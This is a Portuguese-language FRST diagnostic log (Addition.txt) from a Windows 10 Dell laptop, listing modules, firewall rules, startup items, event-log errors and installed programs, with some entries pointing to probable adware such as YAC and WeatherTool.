2016-05-30 03:30 - 2016-05-30 03:30 - 01049712 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\WeatherEntryDll.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-10-28 14:54 - 2016-09-07 01:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-17 10:30 - 2017-03-04 03:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-17 10:31 - 2017-03-04 03:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-17 10:31 - 2017-03-04 03:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-17 10:31 - 2017-03-04 03:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 00:42 - 2017-03-28 02:07 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-04-12 00:42 - 2017-03-28 02:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 00:43 - 2017-03-28 02:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-10 10:39 - 2017-04-10 10:39 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll
2014-01-26 19:09 - 2014-07-11 11:02 - 00127688 _____ () C:\Program Files (x86)\PSafe\CrashLib.dll
2016-12-24 00:30 - 2016-12-24 00:30 - 00574152 _____ () C:\Program Files (x86)\vSnapshot\1.0.0.0\Updata.dll
2016-05-30 03:21 - 2016-05-30 03:21 - 00543344 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPTask.dll
2016-05-30 03:20 - 2016-05-30 03:20 - 00406640 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPNet.dll
2016-05-30 03:19 - 2016-05-30 03:19 - 00428656 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPDR.dll
2017-04-17 19:11 - 2017-04-17 00:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2015-06-24 01:07 - 2015-06-24 01:07 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-04-25 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2017-04-25 09:28 - 2016-05-22 23:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2015-02-26 14:07 - 2015-02-09 13:14 - 01905904 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2013-10-08 04:15 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-02-26 14:07 - 2014-02-18 16:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\itau.com.br -> bankline.itau.com.br
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2013-08-22 10:25 - 2017-04-13 11:38 - 00000822 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
MSCONFIG\Services: AERTFilters => 2
MSCONFIG\Services: OrolixDeviceMonitor => 2
HKLM\...\StartupApproved\Run: => "SynTPEnh"
HKLM\...\StartupApproved\Run: => "DellWPF"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "RtHDVBg"
HKLM\...\StartupApproved\Run: => "BtvStack"
HKLM\...\StartupApproved\Run: => "QuickSet"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKLM\...\StartupApproved\Run32: => "PSafeAV"
HKLM\...\StartupApproved\Run32: => "PSafeTray"
HKLM\...\StartupApproved\Run32: => "PSafeWDS"
HKLM\...\StartupApproved\Run32: => "BAV mini setup"
HKLM\...\StartupApproved\Run32: => "Diebold - Warsaw"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Enviar para o OneNote.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Adobe Playpanel.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\StartupFolder: => "Microsoft SharePoint Workspace.lnk"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "BackgroundContainer"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Facebook Update"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "OfficeSyncProcess"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_75BD889C5F695DD03545732E9F8A7932"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\StartupApproved\Run: => "VDownloader"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [TCP Query User{ABC00D73-4436-4CCF-B22B-4BCD66CF82F2}C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{FCDC5A0A-6DCA-4712-B272-0A7578E11F06}C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\ademir monteiro\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{18C3FE74-FDE4-42DE-8156-E1A733EA7C0E}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{16D067DB-6231-47FD-A3CB-8629B61E3B60}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{6B446C8A-9266-46AB-85A6-E92C5974B43E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{262684D5-BC5E-4F5C-8F2E-98E50A972023}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{3608EEA0-8AA6-4702-9D10-A82439A2F0C4}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{3C12E942-8ABC-4F4B-AECE-95427827D42A}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{EBA14474-EF63-41DF-85B8-97647663D51D}] => (Allow) C:\Users\ADEMIR MONTEIRO\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [TCP Query User{913B2E14-C0BF-4700-A055-033DFD3AD27C}C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [UDP Query User{60121106-2C58-4E36-A679-AF2E6DB3288E}C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\ademir monteiro\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [TCP Query User{EE018A31-18C0-4E06-A18E-3F0B8E9FC092}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{C8AF1857-9645-4672-AD85-3340E2EC4519}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{84F9CA59-9F31-4EBB-95E5-2911621BCED1}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{ACA1BE0D-6002-4FE3-BC36-1CF4AFB452DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2F741DD0-F787-409E-A9D6-5CC26B96E1B6}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{63A99386-ABB8-4DE5-B464-8682581FB0CB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{E82E9915-0DCD-42E5-B864-B4538715A49C}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{AA08E42F-D4F0-463E-9AE2-5CF14818877E}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s317j90d848001848001.dat
FirewallRules: [{2720CE7D-3BA2-4F9D-9A26-82C988FE6B68}] => (Allow) C:\Program Files (x86)\MIO\loader\st750lm022xhn-m750mbb_s317j90d848001848001.dat
==================== Pontos de Restauração =========================
17-04-2017 20:17:30 Ponto de Verificação Agendado
21-04-2017 18:36:14 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (04/25/2017 06:11:31 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 05:39:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 11:37:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 11:07:34 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 10:37:35 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADEMIR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/25/2017 10:35:11 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 2cd4
Hora de Início: 01d2bdc88b791a52
Hora de Término: 29
Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ID do Relatório: ff16f1e8-29bb-11e7-bfec-3c77e6d2e70c
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Error: (04/25/2017 10:33:37 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 311c
Hora de Início: 01d2bdc7c7975bfc
Hora de Término: 16
Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ID do Relatório: c733f1e3-29bb-11e7-bfec-3c77e6d2e70c
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Error: (04/25/2017 10:28:42 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (04/25/2017 10:28:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: O programa MicrosoftEdgeCP.exe versão 11.0.14393.953 parou de interagir com o Windows e foi fechado. Para ver se há mais informações disponíveis sobre o problema, verifique o histórico de problemas no painel de controle Segurança e Manutenção.
ID do Processo: 2ae0
Hora de Início: 01d2bdc77aa205ae
Hora de Término: 16
Caminho do Aplicativo: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ID do Relatório: 03465e69-29bb-11e7-bfec-3c77e6d2e70c
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Error: (04/25/2017 10:26:03 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: microsoftedgecp.exe, versão: 11.0.14393.953, carimbo de data/hora: 0x58ba5911
Nome do módulo com falha: ntdll.dll, versão: 10.0.14393.479, carimbo de data/hora: 0x5825887f
Código de exceção: 0xc0000005
Deslocamento da falha: 0x000000000004acbd
ID do processo com falha: 0x1458
Hora de início do aplicativo com falha: 0x01d2bdbff0d1b88d
Caminho do aplicativo com falha: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe
Caminho do módulo com falha: C:\WINDOWS\SYSTEM32\ntdll.dll
ID do Relatório: d4671552-07f5-416c-a38f-48b46ee20781
Nome completo do pacote com falha: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe
ID do aplicativo relativo ao pacote com falha: MicrosoftEdge
Erros de Sistema:
=============
Error: (04/25/2017 05:39:20 PM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 05:36:22 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
e APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 12:01:32 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 10:26:05 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{3185A766-B338-11E4-A71E-12E3F512A338}
e APPID
{7006698D-2974-4091-A424-85DD0B909E23}
ao usuário AUTORIDADE NT\SERVIÇO LOCAL SID (S-1-5-19) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (04/25/2017 09:28:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço YAC Kit Driver devido ao seguinte erro:
Não há suporte para o pedido.
Error: (04/25/2017 09:24:48 AM) (Source: DCOM) (EventID: 10010) (User: AUTORIDADE NT)
Description: O servidor {784E29F4-5EBE-4279-9948-1E8FE941646D} não se registrou no DCOM dentro do tempo limite necessário.
Error: (04/25/2017 09:23:55 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Serviço Windows Defender foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 100 milissegundos: Executar o programa de recuperação configurado.
Error: (04/25/2017 09:21:49 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
e APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
CodeIntegrity:
===================================
Date: 2017-04-25 18:23:46.685
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 18:11:29.504
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 18:02:38.867
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 17:36:00.602
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 11:52:34.913
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 11:32:52.865
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 11:22:34.801
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 10:58:23.657
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 10:52:34.784
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
Date: 2017-04-25 10:37:35.301
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz
Percentagem de memória em uso: 63%
RAM física total: 3961.09 MB
RAM física disponível: 1437.06 MB
Virtual Total: 5981.75 MB
Virtual disponível: 2611.1 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:687.44 GB) (Free:488.82 GB) NTFS
Drive e: (PBR Image) (Fixed) (Total:9.62 GB) (Free:0.72 GB) NTFS
Drive f: (ESP) (Fixed) (Total:0.48 GB) (Free:0.44 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 33DB2EEA)
Partition: GPT.
==================== Fim de Addition.txt ============================
Executado por ADEMIR MONTEIRO (25-04-2017 18:25:51)
Executando a partir de C:\Users\ADEMIR MONTEIRO\Downloads
Windows 10 Home Single Language Versão 1607 (X64) (2016-10-22 16:38:13)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
ADEMIR MONTEIRO (S-1-5-21-1492537628-2073842835-3753687853-1001 - Administrator - Enabled) => C:\Users\ADEMIR MONTEIRO
Administrador (S-1-5-21-1492537628-2073842835-3753687853-500 - Administrator - Disabled)
Convidado (S-1-5-21-1492537628-2073842835-3753687853-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-1492537628-2073842835-3753687853-503 - Limited - Disabled)
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Apple Mobile Device Support (HKLM\...\{DB18F1C0-846F-46F5-A074-5B97C8AF5C8E}) (Version: 10.3.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Assistente de Atualização do Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17364 - Microsoft Corporation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Call of Duty(R) 4 - Modern Warfare(TM) Demo (HKLM-x32\...\InstallShield_{6734CA10-8FB8-4C7F-B8C7-75317C617DC5}) (Version: 1.00.0000 - Activision)
Call of Duty(R) 4 - Modern Warfare(TM) Demo (x32 Version: 1.00.0000 - Activision) Hidden
Chromium (HKLM-x32\...\{1D62F5A2-4DE2-2422-FC62-54A22CE28722}) (Version: - )
Citrix Online Launcher (HKLM-x32\...\{6740FE60-43C1-4D15-8C4A-001624134B14}) (Version: 1.0.312 - Citrix)
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 11.0 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.1.70 - Dell Inc.)
Dell Data Vault (Version: 4.2.2.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.212 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{287348C8-8B47-4C36-AF28-441A3B7D8722}) (Version: 1.0.3.60494 - Dell)
Dell System Detect (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\d24084d039586cae) (Version: 8.4.0.5 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.4 - Synaptics Incorporated)
Dell Update - SupportAssist Update Plugin (HKLM\...\{5F641343-FA40-4084-855A-7FA3251783DC}) (Version: 2.0.2.1840 - Dell Inc.)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
EPSON L555 Series Printer Uninstall (HKLM\...\EPSON L555 Series) (Version: - SEIKO EPSON Corporation)
Euro Truck Simulator 2 (HKLM-x32\...\{1B705E8F-9893-4486-B5D7-4F7FEB9C871E}_is1) (Version: 1.12.1 - SCS Software)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Galeria de Fotos (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
